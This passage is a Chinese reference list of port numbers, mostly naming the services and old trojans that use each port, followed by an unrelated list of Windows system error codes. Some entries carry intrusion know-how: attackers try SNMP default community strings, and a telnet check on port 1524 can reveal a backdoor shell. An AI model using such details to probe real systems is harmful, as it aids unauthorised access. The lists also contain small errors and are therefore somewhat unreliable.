说明：NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。

端口：135
服务：Location Service
说明：Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。
端口：137、138、139
服务：NETBIOS Name Service
说明：其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139端口：通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。
端口：143
服务：Interim Mail Access Protocol v2
说明：和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。
端口：161
服务：SNMP
说明：SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

端口：177
服务：X Display Manager Control Protocol
说明：许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。
端口：389
服务：LDAP、ILS
说明：轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
端口：443
服务：Https
说明：网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。
端口：456
服务：[NULL]
说明：木马HACKERS PARADISE开放此端口。
端口：513
服务：Login,remote login
说明：是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。
端口：544
服务：[NULL]
说明：kerberos kshell
端口：548
服务：Macintosh,File Services(AFP/IP)
说明：Macintosh,文件服务。
端口：553
服务：CORBA IIOP （UDP）
说明：使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

端口：555
服务：DSF
说明：木马PhAse1.0、Stealth Spy、IniKiller开放此端口。
端口：568
服务：Membership DPA
说明：成员资格 DPA。
端口：569
服务：Membership MSN
说明：成员资格 MSN。
端口：635
服务：mountd
说明：Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。
端口：636
服务：LDAP
说明：SSL（Secure Sockets layer）
端口：666
服务：Doom Id Software
说明：木马Attack FTP、Satanz Backdoor开放此端口
端口：993
服务：IMAP
说明：SSL（Secure Sockets layer）
端口：1001、1011
服务：[NULL]
说明：木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。

端口：1024
服务：Reserved
说明：它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。
端口：1025、1033
服务：1025：network blackjack 1033：[NULL]
说明：木马netspy开放这2个端口。
端口：1080
服务：SOCKS
说明：这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。
端口：1170
服务：[NULL]
说明：木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。
端口：1234、1243、6711、6776
服务：[NULL]
说明：木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。

端口：1245
服务：[NULL]
说明：木马Vodoo开放此端口。
端口：1433
服务：SQL
说明：Microsoft的SQL服务开放的端口。
端口：1492
服务：stone-design-1
说明：木马FTP99CMP开放此端口。
端口：1500
服务：RPC client fixed port session queries
说明：RPC客户固定端口会话查询
端口：1503
服务：NetMeeting T.120
说明：NetMeeting T.120
端口：1524
服务：ingress
说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。
端口：1600
服务：issd
说明：木马Shivka-Burka开放此端口。

端口：1720
服务：NetMeeting
说明：NetMeeting H.233 call Setup。
端口：1731
服务：NetMeeting Audio Call Control
说明：NetMeeting音频调用控制。
端口：1807
服务：[NULL]
说明：木马SpySender开放此端口。
端口：1981
服务：[NULL]
说明：木马ShockRave开放此端口。
端口：1999
服务：cisco identification port
说明：木马BackDoor开放此端口。

端口：2000
服务：[NULL]
说明：木马GirlFriend 1.3、Millenium 1.0开放此端口。
端口：2001
服务：[NULL]
说明：木马Millenium 1.0、Trojan Cow开放此端口。
端口：2023
服务：xinuexpansion 4
说明：木马Pass Ripper开放此端口。
端口：2049
服务：NFS
说明：NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。
端口：2115
服务：[NULL]
说明：木马Bugs开放此端口。

端口：2140、3150
服务：[NULL]
说明：木马Deep Throat 1.0/3.0开放此端口。
端口：2500
服务：RPC client using a fixed port session replication
说明：应用固定端口会话复制的RPC客户
端口：2583
服务：[NULL]
说明：木马Wincrash 2.0开放此端口。
端口：2801
服务：[NULL]
说明：木马Phineas Phucker开放此端口。
端口：3024、4092
服务：[NULL]
说明：木马WinCrash开放此端口。
端口：3128
服务：squid
说明：这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。
端口：3129
服务：[NULL]
说明：木马Master Paradise开放此端口。
端口：3150
服务：[NULL]
说明：木马The Invasor开放此端口。
端口：3210、4321
服务：[NULL]
说明：木马SchoolBus开放此端口

端口：3333
服务：dec-notes
说明：木马Prosiak开放此端口
端口：3389
服务：超级终端
说明：WINDOWS 2000终端开放此端口。
端口：3700
服务：[NULL]
说明：木马Portal of Doom开放此端口
端口：3996、4060
服务：[NULL]
说明：木马RemoteAnything开放此端口
端口：4000
服务：QQ客户端
说明：腾讯QQ客户端开放此端口。
端口：4092
服务：[NULL]
说明：木马WinCrash开放此端口。
端口：4590
服务：[NULL]
说明：木马ICQTrojan开放此端口。
端口：5000、5001、5321、50505 服务：[NULL]
说明：木马blazer5开放5000端口。木马Sockets de Troie开放5000、5001、5321、50505端口。
端口：5400、5401、5402
服务：[NULL]
说明：木马Blade Runner开放此端口。
端口：5550
服务：[NULL]
说明：木马xtcp开放此端口。
端口：5569
服务：[NULL]
说明：木马Robo-Hack开放此端口。
端口：5632
服务：pcAnywere
说明：有时会看到很多这个端口的扫描，这依赖于用户所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能的代理（这里的代理是指agent而不是proxy）。入侵者也会寻找开放这种服务的计算机。，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。

端口：5742
服务：[NULL]
说明：木马WinCrash1.03开放此端口。
端口：6267
服务：[NULL]
说明：木马广外女生开放此端口。
端口：6400
服务：[NULL]
说明：木马The tHing开放此端口。
端口：6670、6671
服务：[NULL]
说明：木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。
端口：6883
服务：[NULL]
说明：木马DeltaSource开放此端口。
端口：6969
服务：[NULL]
说明：木马Gatecrasher、Priority开放此端口。
端口：6970
服务：RealAudio
说明：RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。
端口：7000
服务：[NULL]
说明：木马Remote Grab开放此端口。
端口：7300、7301、7306、7307、7308
服务：[NULL]
说明：木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。

端口：7323
服务：[NULL]
说明：Sygate服务器端。
端口：7626
服务：[NULL]
说明：木马Giscier开放此端口。
端口：7789
服务：[NULL]
说明：木马ICKiller开放此端口。
端口：8000
服务：OICQ
说明：腾讯QQ服务器端开放此端口。 '
端口：8010
服务：Wingate
说明：Wingate代理开放此端口。
端口：8080
服务：代理端口
说明：WWW代理开放此端口。
端口：9400、9401、9402
服务：[NULL]
说明：木马Incommand 1.0开放此端口。
端口：9872、9873、9874、9875、10067、10167
服务：[NULL]
说明：木马Portal of Doom开放此端口
端口：9989
服务：[NULL]
说明：木马iNi-Killer开放此端口。
端口：11000
服务：[NULL]
说明：木马SennaSpy开放此端口。
端口：11223
服务：[NULL]
说明：木马Progenic trojan开放此端口。
端口：12076、61466
服务：[NULL]
说明：木马Telecommando开放此端口。
端口：12223
服务：[NULL]
说明：木马Hack'99 KeyLogger开放此端口。
端口：12345、12346
服务：[NULL]
说明：木马NetBus1.60/1.70、GabanBus开放此端口。
端口：12361
服务：[NULL]
说明：木马Whack-a-mole开放此端口。
端口：13223
服务：PowWow
说明：PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。

端口：16969
服务：[NULL]
说明：木马Priority开放此端口。
端口：17027
服务：Conducent
说明：这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。
端口：19191
服务：[NULL]
说明：木马蓝色火焰开放此端口。
端口：20000、20001
服务：[NULL]
说明：木马Millennium开放此端口。
端口：20034
服务：[NULL]
说明：木马NetBus Pro开放此端口。
端口：21554
服务：[NULL]
说明：木马GirlFriend开放此端口。
端口：22222
服务：[NULL]
说明：木马Prosiak开放此端口。

端口：23456
服务：[NULL]
说明：木马Evil FTP、Ugly FTP开放此端口。
端口：26274、47262
服务：[NULL]
说明：木马Delta开放此端口。
端口：27374
服务：[NULL]
说明：木马Subseven 2.1开放此端口。
端口：30100
服务：[NULL]
说明：木马NetSphere开放此端口。
端口：30303
服务：[NULL]
说明：木马Socket23开放此端口。
端口：30999
服务：[NULL]
说明：木马Kuang开放此端口。
端口：31337、31338
服务：[NULL]
说明：木马BO(Back Orifice)开放此端口。另外木马DeepBO也开放31338端口。
端口：31339
服务：[NULL]
说明：木马NetSpy DK开放此端口。
端口：31666
服务：[NULL]
说明：木马BOWhack开放此端口。

端口：33333
服务：[NULL]
说明：木马Prosiak开放此端口。
端口：34324
服务：[NULL]
说明：木马Tiny Telnet Server、BigGluck、TN开放此端口。
端口：40412
服务：[NULL]
说明：木马The Spy开放此端口。
端口：40421、40422、40423、40426、
服务：[NULL]
说明：木马Masters Paradise开放此端口。
端口：43210、54321
服务：[NULL]
说明：木马SchoolBus 1.0/2.0开放此端口。
端口：44445
服务：[NULL]
说明：木马Happypig开放此端口。
端口：50766
服务：[NULL]
说明：木马Fore开放此端口。

端口：53001
服务：[NULL]
说明：木马Remote Windows Shutdown开放此端口。
端口：65000
服务：[NULL]
说明：木马Devil 1.03开放此端口。
端口：88
说明：Kerberos krb5。另外TCP的88端口也是这个用途。
端口：137
说明：SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。
端口：161
说明：Simple Network Management Protocol(SMTP)（简单网络管理协议）
端口：162
说明：SNMP Trap（SNMP陷阱）
端口：445
说明：Common Internet File System(CIFS)（公共Internet文件系统）
端口：464
说明：Kerberos kpasswd(v5)。另外TCP的464端口也是这个用途。

端口：500
说明：Internet Key Exchange(IKE)（Internet密钥交换）
端口：1645、1812
说明：Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(远程认证拨号用户服务)
端口：1646、1813
说明：RADIUS accounting(Routing and Remote Access)(RADIUS记帐（路由和远程访问）)
端口：1701
说明：Layer Two Tunneling Protocol(L2TP)(第2层隧道协议)
端口：1801、3527
说明：Microsoft Message Queue Server(Microsoft消息队列服务器)。还有TCP的135、1801、2101、2103、2105也是同样的用途。
端口：2504
说明：Network Load Balancing(网络平衡负荷)
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用一种通常的闭合端口
连接它时将产生不同的结果。一种典型的扫描：使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。

0133 对于包含已连接驱动器的驱动器，不能使用 JOIN 或 SUBST 命令。
0134 试图在已经连接的驱动器上使用 JOIN 或 SUBST 命令。
0135 试图在已经替换的驱动器上使用 JOIN 或 SUBST 命令。
0136 系统试图删除尚未连接的驱动器的 JOIN。
0137 系统试图删除尚未替换的驱动器的替换项。
0138 系统试图将驱动器连接到已连接的驱动器下的目录。
0139 系统试图将驱动器替换成已替换的驱动器下的目录。
0140 系统试图将驱动器连接到已替换的驱动器的一个目录中。
0141 系统试图将驱动器替换成到已连接的驱动器下的目录。
0142 此时系统无法运行 JOIN 或 SUBST。
0143 系统无法将驱动器连接到或替换成同一驱动器下的目录。
0144 此目录不是该根目录的子目录。
0145 该目录未清空。
0146 指定的路径已经在替换中使用。
0147 资源不足，无法执行该命令。
0148 此时无法使用指定的路径。
0149 试图连接或替换某个驱动器目录，该驱动器上的某个目录是上一次替换的目标目录。
0150 CONFIG.SYS 文件未指定系统跟踪信息，或禁止跟踪。
0151 DosMuxSemWait 的指定信号事件的数目不正确。
0152 DosMuxSemWait 没有运行；已经设置太多的标志。
0153 DosMuxSemWait 列表不正确。
0154 输入的卷标超过目标文件系统的标号字符长度极限。
0155 无法创建其他线程。
0156 接收进程拒绝该信号。
0157 已经放弃该区域，因此无法锁定。
0158 该区域已经解除锁定。
0159 线程标识符的地址错误。
0160 传到 DosExecPgm 的参数字符串错误。
0161 指定的路径无效。
0162 信号已挂起。
0164 系统无法创建其他线程。
0167 无法锁定文件的范围。
0170 所要求的资源正在使用中。
0173 锁定请求对于提供的取消区域不重要。
0174 文件系统不支持到锁定类型的自动更改。
0180 系统检测到错误的区域号码。
0182 操作系统无法运行 %1。
0183 不能创建已经存在的文件。
0186 传送的标志不正确。
0187 找不到指定的系统信号名称。
0188 操作系统无法运行 %1。
0189 操作系统无法运行 %1。
0190 操作系统无法运行 %1。
0191 无法在 Win32 模式下运行 %1。
0192 操作系统无法运行 %1。
0193 %1 不是有效的 Win32 应用程序。
0194 操作系统无法运行 %1。
0195 操作系统无法运行 %1。
0196 操作系统无法运行此应用程序。
0197 当前无法配置操作系统运行此应用程序。
0198 操作系统无法运行 %1。
0199 操作系统无法运行此应用程序。
0200 代码段应小于 64K。
0201 操作系统无法运行 %1。
0202 操作系统无法运行 %1。
0203 系统找不到输入的环境选项。
0205 在命令子树中的进程没有信号句柄。
0206 文件名或扩展名太长。
0207 环 2 堆栈正在使用中。
0208 输入的全局文件名字符 * 或 ? 不正确，或指定的全局文件名字符太多。
0209 所发送的信号不正确。
0210 无法设置信号处理程序。
0212 区域已锁定，无法重新分配。
0214 附加到此程序或动态链接模块的动态链接模块太多。
0215 无法嵌套调用 LoadModule。
0216 图像文件 %1 有效，但不适用于本机类型。
0230 管道状态无效。
0231 所有的管道实例都处于忙状态。
0232 管道正在关闭。
0233 在管道的另一端没有进程。
0234 有更多可用的数据。
0240 已取消会话。
0254 指定的扩展属性名无效。
0255 扩展属性不一致。
0258 等待操作过时。
0259 没有其他可用数据。
0266 无法使用复制功能。
0267 目录名无效。
0275 扩展属性不匹配缓冲区。
0276 所装载的文件系统上的扩展属性文件已被损坏。
0277 扩展属性表格文件已满。
0278 指定的扩展属性句柄无效。
0282 安装的文件系统不支持扩展属性。
0288 试图释放不属于调用者的多路同步信号。
0298 信号投递的次数太多。
0299 仅完成部分 ReadProcessMemory 或 WriteProcessMemory 请求。
0300 操作锁定请求被拒绝。
0301 系统接收了一个无效的操作锁定确认。
0317 在 %2 的消息文件中，系统无法找到消息号为 0x%1 的消息文本。
0487 试图访问无效地址。
1078 该名称已经用作服务名或服务显示名。
1079 此服务的帐户不同于运行于同一进程上的其它服务的帐户。
1080 只能为 Win32 服务设置失败操作，不能为驱动程序设置。
1081 这个服务所运行的进程和服务控制管理器相同。所以，如果服务进程意外中止的话，服务控制管理器无法进行任何操作。
1082 这个服务没有设置恢复程序。
1083 配置成在该可执行程序中运行的这个服务不能执行该服务。
1100 已经到达磁带的物理尽头。
1101 磁带访问到文件标记。
1102 到达磁带或分区首部。
1103 磁带访问到文件组的末尾。
1104 磁带上没有其他数据。
1105 磁带无法分区。
1106 访问多重卷分区的新磁带时，当前的区块大小不正确。
1107 加载磁带时，找不到磁带分区信息。
1108 无法锁定媒体退出功能。
1109 无法卸载媒体。
1110 驱动器中的媒体已经更改。
1111 已经复位 I/O 总线。
1112 驱动器中没有媒体。
1113 在目标多字节代码页中不存在对单码字符的映射。
1114 动态链接库 (DLL) 初始化例程失败。
1115 正在关闭系统。
1116 无法终止系统关机，因为没有进行中的关机操作。
1117 由于 I/O 设备出现错误，无法运行该请求。
1118 串行设备初始化失败。将卸载串行驱动程序。
1119 无法打开正与其他设备共享中断请求 (IRQ) 的设备。至少有一个使用该 IRQ 的设备已经打开。
1120 由于再次写入串行口，串行 I/O 操作已结束。（IOCTL_SERIAL_XOFF_COUNTER 为零。）
1121 由于超时，串行 I/O 操作已结束。 (IOCTL_SERIAL_XOFF_COUNTER 未达到零。)
1122 在软盘上找不到标识符地址标记。
1123 软盘扇区标识符字段与软盘控制器磁道地址不匹配。
1124 软盘控制器报告软盘驱动程序不能识别的错误。
1125 软盘控制器返回的结果和注册的不一致。
1126 访问硬盘时，再校准操作失败，再试一次后也无法操作。
1127 访问硬盘时，磁盘操作失败，再试一次后仍没有作用。
1128 访问硬盘时，需要重启动磁盘控制器，但仍未成功。
1129 磁带已卷到尽头。
1130 可用的服务器存储区不足，无法执行该命令。
1131 检测到潜在的死锁情况。
1132 指定的基址或文件偏移量没有正确对齐。
1140 试图更改系统电源状态的操作被另一应用程序或驱动程序禁止。
1141 系统 BIOS 无法更改系统电源状态。
1142 试图在一文件上创建超过系统允许数额的链接。
1150 指定的程序需要新的 Windows 版本。
1151 指定的程序不是 Windows 或 MS-DOS 程序。
1152 无法启动指定程序的多个实例。
1153 指定的程序是为 Windows 的早期版本编写的。
1154 运行此应用程序所需的某个库文件已损。
1155 没有应用程序与该操作中所指定的文件关联。
1156 将命令发送到应用程序时出现错误。
1157 找不到运行此应用程序所需的某个库文件。
1158 当前进程已使用了 Window 管理器对象的系统允许的所有句柄。
1159 消息只能与同步操作一起使用。
1160 指出的源元素没有媒体。
1161 指出的目标元素已包含媒体。
1162 指出的元素不存在。
1163 指出的元素是未显示的存储资源的一部分。
1164 指出的设备需要重新初始化，因为硬件有错误。
1165 设备显示在尝试进一步操作之前需要清除。
1166 设备显示它的门仍是打开状态。
1167 设备没有连接。
1168 找不到元素。
1169 索引中没有同指定项相匹配的项。
1170 在对象上不存在指定的属性集。
1171 传递到 GetMouseMovePoints 的点不在缓冲区中。
1172 跟踪(工作站)服务没运行。
1173 找不到卷 ID。
1175 无法删除要被替换的文件。
1176 无法将替换文件移到要被替换的文件。要被替换的文件保持原来的名称。
1177 无法将替换文件移到要被替换的文件。要被替换的文件已被重新命名为备份名称。
1178 卷更改记录被删除。
1179 卷更改记录服务不处于活动中。
1180 找到一份文件，但是可能不是正确的文件。
1181 日志项已从日志中删除。
1200 指定的设备名无效。
1201 设备当前虽然未连接，但它是记忆连接。
1202 试图记起已经记住的设备。
1203 网络供应商不接受给定的网络路径。
1204 指定的网络供应商名无效。
1205 无法打开网络连接配置文件。
1206 网络连接配置文件已损坏。
1207 无法列举非包容类。
1208 出现扩展错误。
1209 指定组名的格式无效。
1210 指定计算机名的格式无效。
1211 指定事件名的格式无效。
1212 指定域名的格式无效。
1213 指定服务名的格式无效。
1214 指定网络名的格式无效。
1215 指定共享名的格式无效。
1216 指定密码的格式无效。
1217 指定的邮件名无效。
1218 指定邮件目的地的格式无效。
1219 所提供的凭据与现有凭据设置冲突。
1220 试图与网络服务器建立会话，但目前与该服务器建立的会话太多。
1221 网络上的其他计算机已经使用该工作组或域名。
1222 网络不存在或者没有启动。
1223 用户已经取消该操作。
1224 所要求的操作无法在已经打开用户映射区域的文件中运行。
1225 远程系统拒绝网络连接。
1226 已经关闭网络连接。
1227 网络传输的终点已经有一个地址与其关联。
1228 网络终点尚未与地址关联。
1229 试图在不存在的网络连接中操作。
1230 试图在活动的网络连接上进行无效操作。
1231 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1232 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1233 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1234 远程系统的目标网络端点没有运行任何服务。
1235 该请求已经终止。
1236 本地系统已经终止网络连接。
1237 无法完成操作。请再试一次。
1238 无法创建到该服务器的连接，因为已经到达了该帐户同时连接的最大数目。
1239 试图在该帐户未授权的时间内登录。
1240 尚未授权此帐户从该站登录网络。
1241 网络地址无法用于要求的操作。
1242 服务已经注册。
1243 指定的服务不存在。
1244 由于尚未验证用户身份，无法执行要求的操作。
1245 由于用户尚未登录网络，无法运行要求的操作。指定的服务不存在。
1246 继续工作。
1247 完成初始化操作后，试图再次运行初始化操作。
1248 没有其他本地设备。
1249 指定的站点不存在。
1250 具有指定名称的域控制器已经存在。
1251 只有连接到服务器上时，才支持该操作。
1252 即使没有改动，组策略框架也应该调用扩展。
1253 指定的用户没有一个有效的配置文件。
1254 Microsoft Small Business Server 不支持此操作。
1300 不是对所有的调用方分配引用特权。
1301 帐户名与安全标识符之间的映射未完成。
1302 没有为该帐户明确地设置系统配额限制。
1303 没有可用的密钥。返回已知的密钥。
1304 密码太复杂，无法转换成 LAN Manager 密码。返回的 LAN Manager 密码是空字符串。
1305 修订级别未知。
1306 表示两个修订级别不兼容。
1307 无法将此安全标识符指定为该对象的拥有者。
1308 无法将此安全标识符指定为主要的对象组。
1309 当前并未模拟客户的线程试图操作模拟令牌。
1310 不可以禁用该组。
1311 目前没有可用的登录服务器处理登录请求。
1312 指定的登录会话不存在。该会话可能已终止。
1313 指定的权限不存在。
1314 客户不保留请求的权限。
1315 提供的名称不是正确的帐户名称格式。
1316 指定的用户已经存在。
1317 指定的用户不存在。
1318 指定的组已经存在。
1319 指定的组不存在。
1320 或者指定的用户帐户已经是某个特定组的成员，或者也可能指定的组非空而不能被删除。
1321 指定的用户帐户不是所指定组帐户的成员。
1322 上次保留的管理帐户无法关闭或删除。
1323 无法更新密码。所输入的密码不正确。
1324 无法更新密码。所提供的新密码包含不可用于密码的值。
1325 无法更新密码。为新密码提供的值不符合字符域的长度、复杂性或历史要求。
1326 登录失败: 用户名未知或密码错误。
1327 登录失败: 用户帐户限制。
1328 登录失败: 违反帐户登录时间限制。
1329 登录失败: 禁止用户登录到该计算机上。
1330 登录失败: 指定的帐户密码已过期。
1331 登录失败: 当前禁用帐户。
1332 未完成帐户名与安全性标识符之间的映射。
1333 一次请求的本地用户标识符(LUID)太多。
1334 没有其他可用的本地用户标识符(LUID)。
1335 对这个特定使用来说，安全标识符的子部分是无效的。
1336 访问控制清单(ACL)结构无效。
1337 安全标识符结构无效。
1338 安全描述符结构无效。
1340 无法创建继承的访问控制列表(ACL)或访问控制项目(ACE)。
1341 当前已禁用服务器。
1342 当前已启用服务器。
1343 所提供的值是无效的标识符授权值。
--------------------------------------------------------------------------------
 
--  
--    19:57:25

-- 
1344 没有更多的内存用于更新安全信息。
1345 指定的属性无效，或指定的属性与整个组的属性不兼容。
1346 或者没有提供所申请的模仿级别，或者提供的模仿级别无效。
1347 无法打开匿名级安全性符号。
1348 所请求的验证信息类别无效。
1349 该类符号不能以所尝试的方式使用。
1350 无法在没有相关安全性的对象上运行安全操作。
1351 未能从域控制器读取配置信息，或者是因为机器不可使用，或者是访问被拒绝。
1352 安全帐户管理程序(SAM)或本地安全颁发机构(LSA)服务器状态不正确，所以无法运行安全操作。
1353 域处于执行安全操作的错误状态。
1354 该操作只能在域的主域控制器中执行。
1355 指定的域不存在或联系不上。
1356 指定的域已经存在。
1357 试图超过每个服务器域数目的极限。
1358 由于严重的媒体错误或磁盘的数据结构损坏，无法完成所请求的操作。
1359 发生内部错误。
1360 通用的访问类型包含在访问掩码中，该掩码已经映射为非通用类型。
1361 安全性描述符的格式错误（绝对或自相关）。
1362 请求的操作只准登录进程使用。该调用过程并未被记录为登录进程。
1363 无法用已经使用的标识符来启动新的登录会话。
1364 指定的确认数据包未知。
1365 登录会话的状态与请求的操作不一致。
1366 登录会话标识符正在使用中。
1367 登录请求包含无效的登录类型值。
1368 在使用命名管道读取数据之前，无法经由该管道模拟。
1369 注册表子树的事务状态与所请求的操作不兼容。
1370 突发的内部安全性数据库故障。
1371 无法在内部帐户下运行该操作。
1372 无法在该内部特定组中运行该操作。
1373 无法在该内部特定用户中运行该操作。
1374 因为该组当前是用户的主要组，所以不能从此组中删除用户。
1375 该符号已作为主要符号使用。
1376 指定的本地组不存在。
1377 指定的帐户名不是本地组的成员。
1378 指定的帐户名已经是本地组的成员。
1379 指定的本地组已经存在。
1380 登录失败: 用户在本计算机上没有被授与所需注册类型。
1381 超过了可以存储在单个系统中的最大机密限制。
1382 机密的长度超过了最大允许值。
1383 本地安全授权数据库包含内部不一致的错误。
1384 登录时，用户的安全性上下文累积太多的安全标识符。
1385 登录失败: 用户在本计算机上没有被授与所需注册类型。
1386 经交叉加密的密码必须更改用户密码。
1387 成员不存在，因此无法将其添加到本地组或从中删除。
1388 新成员的帐户类型有误，因此无法将其添加到本地组。
1389 指定的安全标识符太多。
1390 经交叉加密的密码必须更改该用户密码。
1391 表示 ACL 没有可继承的组件。
1392 文件或目录已损坏，无法读取数据。
1393 磁盘结构已损坏，无法读取数据。
1394 指定的登录会话没有用户会话密钥。
1395 正在访问的服务允许特定数目的连接。因为连接的数目已达到服务可接受的数目，所以此时无法创建新的服务连接。
1396 登录失败: 该目标帐户名称不正确。
1397 相互身份验证失败。该服务器在域控制器的密码过期。
1398 在客户机和服务器之间有一个时间差。
1400 窗口句柄无效。
1401 菜单句柄无效。
1402 光标句柄无效。
1403 加速键表的句柄无效。
1404 挂接句柄无效。
1405 多重窗口位置结构句柄无效。
1406 无法创建最上层的子窗口。
1407 找不到窗口类。
1408 窗口无效；属于其他线程。
1409 已经注册热键。
1410 类已经存在。
1411 类不存在。
1412 类窗口仍打开着。
1413 索引无效。
1414 图标句柄无效。
1415 使用私人对话框窗口字。
1416 找不到列表框标识符。
1417 找不到任何通配符。
1418 线程没有打开剪贴板。
1419 尚未注册热键。
1420 该窗口不是有效的对话框窗口。
1421 找不到控制标识符。
1422 由于没有编辑控制，因此该组合框的消息无效。
1423 窗口不是组合框。
1424 高度必须小于 256。
1425 设备上下文(DC)句柄无效。
1426 挂接过程类型无效。
1427 挂接过程无效。
1428 不能在无模块句柄的情况下设置非本地的挂接。
1429 只能全局设置该挂接过程。
1430 已安装日记挂接过程。
1431 未安装挂接过程。
1432 单选列表框的消息无效。
1433 LB_SETCOUNT 发送到活动的列表框。
1434 该列表框不支持制表符。
1435 无法破坏由其他线程所创建的对象。
1436 子窗口不能有菜单。
1437 窗口没有系统菜单。
1438 消息框样式无效。
1439 系统范围内的(SPI_*)的参数无效。
1440 屏幕已经锁定。
1441 多重窗口位置结构中所有窗口句柄必须具有相同的父窗口。
1442 窗口不是子窗口。
1443 GW_* 命令无效。
1444 线程标识符无效。
1445 无法处理非多文档接口(MDI)窗口的消息。
1446 弹出式菜单已激活。
1447 窗口没有滚动条。
1448 滚动条范围不能大于 MAXLONG。
1449 无法以指定的方式显示或关闭窗口。
1450 系统资源不足，无法完成所请求的服务。
1451 系统资源不足，无法完成所请求的服务。
1452 系统资源不足，无法完成所请求的服务。
1453 配额不足，无法完成请求的服务。
1454 配额不足，无法完成请求的服务。
1455 页面交换文件太小，无法完成此项操作。
1456 找不到菜单项。
1457 键盘布局句柄无效。
1458 不允许使用挂钩类型。
1459 该操作需要交互式窗口工作站。
1460 由于超时时间已过，该操作返回。
1461 无效监视器句柄。
1500 事件日志文件已损坏。
1501 无法打开事件日志文件，因此无法启动事件记录服务。
1502 事件日志文件已满。
1503 事件日志文件在两次读取操作间已发生变化。
1601 无法访问 Windows 安装服务。请与技术支持人员联系，确认 Windows 安装服务是否注册正确。
1602 用户取消了安装。
1603 安装时发生严重错误。
1604 安装已挂起，未完成。
1605 这个操作只对当前安装的产品有效。
1606 功能 ID 未注册。
1607 组件 ID 未注册。
1608 未知属性。
1609 句柄处于不正确的状态。
1610 这个产品的配置数据已损坏。请与技术支持人员联系。
1611 组件限制语不存在。
1612 这个产品的安装来源无法使用。请验证来源是否存在，是否可以访问。
1613 Windows 安装服务无法安装这个安装程序包。您必须安装含有 Windows 安装服务新版本的 Windows Service Park。
1614 产品已卸载。
1615 SQL 查询语法不正确或不被支持。
1616 记录字符域不存在。
